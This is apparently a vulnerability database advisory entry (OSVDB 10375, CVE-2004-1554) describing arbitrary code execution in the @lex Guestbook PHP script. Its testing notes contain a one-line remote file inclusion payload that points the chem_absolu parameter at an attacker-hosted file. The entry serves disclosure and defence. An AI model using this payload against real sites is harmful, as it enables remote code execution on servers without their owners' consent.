@lex Guestbook livre_include.php Arbitrary Code Execution

2004-09-28T00:00:00
ID OSVDB:10375
Type osvdb
Reporter OSVDB
Modified 2004-09-28T00:00:00

Description

Manual Testing Notes

http://[victim]/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f

References:

Vendor URL: http://www.alexphpteam.com/ Security Tracker: 1011432 Secunia Advisory ID:12679 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0362.html CVE-2004-1554